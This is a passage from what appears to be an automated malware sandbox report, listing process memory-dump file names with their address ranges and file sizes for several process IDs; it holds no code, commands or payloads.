                                                                                                                  • memory/304-121-0x0000013D735B0000-0x0000013D735DB000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/508-783-0x00000000058E0000-0x00000000058FC000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    112KB

                                                                                                                  • memory/508-13-0x0000000073680000-0x0000000073D6E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.9MB

                                                                                                                  • memory/508-14-0x00000000054E0000-0x00000000054F0000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/508-16-0x00000000068C0000-0x00000000068CA000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    40KB

                                                                                                                  • memory/508-812-0x0000000077412000-0x0000000077413000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/508-86-0x00000000054E0000-0x00000000054F0000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/508-76-0x0000000073680000-0x0000000073D6E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.9MB

                                                                                                                  • memory/584-71-0x0000022D64AB0000-0x0000022D64ADB000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/584-70-0x0000022D64A80000-0x0000022D64AA5000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    148KB

                                                                                                                  • memory/584-106-0x00007FFFC8505000-0x00007FFFC8506000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/584-105-0x00007FFF884F0000-0x00007FFF88500000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/584-100-0x0000022D64AB0000-0x0000022D64ADB000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/584-75-0x0000022D64AB0000-0x0000022D64ADB000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/636-127-0x000001F3C7E60000-0x000001F3C7E8B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/636-84-0x000001F3C7E60000-0x000001F3C7E8B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/728-102-0x0000029A1F940000-0x0000029A1F96B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/908-124-0x000001FAEE580000-0x000001FAEE5AB000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/1004-103-0x0000028C31FC0000-0x0000028C31FEB000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

                                                                                                                  • memory/3520-27-0x00007FFFABA40000-0x00007FFFAC42C000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    9.9MB

                                                                                                                  • memory/3520-83-0x00007FFFABA40000-0x00007FFFAC42C000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    9.9MB

                                                                                                                  • memory/3520-30-0x00000201F1CC0000-0x00000201F1CE2000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    136KB

                                                                                                                  • memory/3520-33-0x00000201F1E80000-0x00000201F1EF6000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    472KB

                                                                                                                  • memory/3520-29-0x00000201F1D70000-0x00000201F1D80000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/3520-45-0x00000201F1D70000-0x00000201F1D80000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/3520-52-0x00000201F1D30000-0x00000201F1D5A000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    168KB

                                                                                                                  • memory/3520-53-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/3520-73-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/3520-54-0x00007FFFC6D40000-0x00007FFFC6DEE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    696KB

                                                                                                                  • memory/3520-28-0x00000201F1D70000-0x00000201F1D80000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/3520-74-0x00007FFFC6D40000-0x00007FFFC6DEE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    696KB

                                                                                                                  • memory/4184-98-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/4184-61-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/4184-55-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/4184-56-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/4184-59-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/4184-62-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/4184-57-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/4184-67-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/4184-64-0x00007FFFC6D40000-0x00007FFFC6DEE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    696KB

                                                                                                                  • memory/4484-959-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/4484-901-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/4484-960-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/4484-897-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/4484-903-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/4484-899-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/4484-893-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/4484-892-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/4484-895-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.9MB

                                                                                                                  • memory/4924-22-0x0000000073680000-0x0000000073D6E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.9MB

                                                                                                                  • memory/4924-4-0x0000000005200000-0x0000000005210000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/4924-5-0x0000000005210000-0x0000000005276000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    408KB

                                                                                                                  • memory/4924-6-0x0000000005D30000-0x0000000005D42000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    72KB

                                                                                                                  • memory/4924-3-0x0000000005150000-0x00000000051E2000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    584KB

                                                                                                                  • memory/4924-7-0x0000000006120000-0x000000000615E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    248KB

                                                                                                                  • memory/4924-0-0x00000000007F0000-0x000000000085C000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    432KB

                                                                                                                  • memory/4924-2-0x00000000055B0000-0x0000000005AAE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    5.0MB

                                                                                                                  • memory/4924-1-0x0000000073680000-0x0000000073D6E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.9MB